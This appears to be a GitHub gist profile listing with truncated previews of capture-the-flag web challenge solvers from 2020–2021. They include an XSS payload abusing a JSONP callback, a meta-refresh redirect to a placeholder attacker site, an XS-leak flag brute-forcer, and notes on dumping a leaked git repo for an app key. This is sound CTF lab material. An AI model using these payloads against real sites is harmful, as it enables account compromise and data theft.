Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Jorge jorgectf

🎯
Focusing
View GitHub Profile
@jorgectf
jorgectf / LineCTF_2021_Your-Notes.py
Last active Mar 21, 2021
Line's CTF Your Notes solver.
View LineCTF_2021_Your-Notes.py
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
@jorgectf
jorgectf / NahamConCTF_2021_AgentTester.py
Last active Mar 15, 2021
NahamCon CTF's AgentTester solver.
View NahamConCTF_2021_AgentTester.py
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string
import requests
def random_string(length):
@jorgectf
jorgectf / AeroCTF_2021_Not-received-points.md
Last active Mar 1, 2021
AeroCTF 2021's "Not received points" solution.
View AeroCTF_2021_Not-received-points.md

Void _.escape

// this made empty the client-side func that escaped our input
_.escape = function(s) {return s}

Leak flag image uri

// XSS through JSONP from accounts.google.com
<scr<script>ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){
@jorgectf
jorgectf / CybexCTF_2021_WaloW3b.html
Last active Feb 15, 2021
CybexCTF 2021's WaloW3b solver.
View CybexCTF_2021_WaloW3b.html
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
const localURL = "https://127.0.0.1:4000"
@jorgectf
jorgectf / ql.json
Last active Dec 25, 2020
VSCode's CodeQL Snippets
View ql.json
{
// https://code.visualstudio.com/docs/editor/userdefinedsnippets
/*"For Loop": {
"prefix": ["for", "for-const"],
"body": ["for (const ${2:element} of ${1:array}) {", "\t$0", "}"],
"description": "A for loop."
}*/
"Metadata": { // https://codeql.github.com/docs/writing-codeql-queries/metadata-for-codeql-queries/
@jorgectf
jorgectf / DefCamp_2020.md
Last active Dec 8, 2020
Solution for some DefCamp 2020 CTF's Web challenges.
View DefCamp_2020.md

environ

Git repo leaked inside /backup (dumpable by replacing .git by backup in GitTools' Dumper). Inside the repo, the source code could be seen by seeing the logs (git show HEAD~3) and the APP_KEY (git show HEAD~1).

Entry point:

<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;
@jorgectf
jorgectf / DragonSector_2020_Scratchpad.html
Last active Dec 24, 2020
Solution for DragonSector 2020 CTF's ScratchPad challenge.
View DragonSector_2020_Scratchpad.html
<!-- Note's content forcing a redirection in 0 seconds to the supplied URL -->
<meta http-equiv="refresh" content="0; url=http://your.site/contentBelow">
<!-- Iterating over the alphabet to query a match (regex) to the iterated letter in order to wrap script's onload event (will be executed if the page is loaded correctly a.k.a no 404 status code) and append working letter to the 'known' flag -->
<html>
<body>
<script>
let known = encodeURIComponent("^DrgnS{NoSameSiteCookiesByDefault\\?!}$");
let iterator = 0;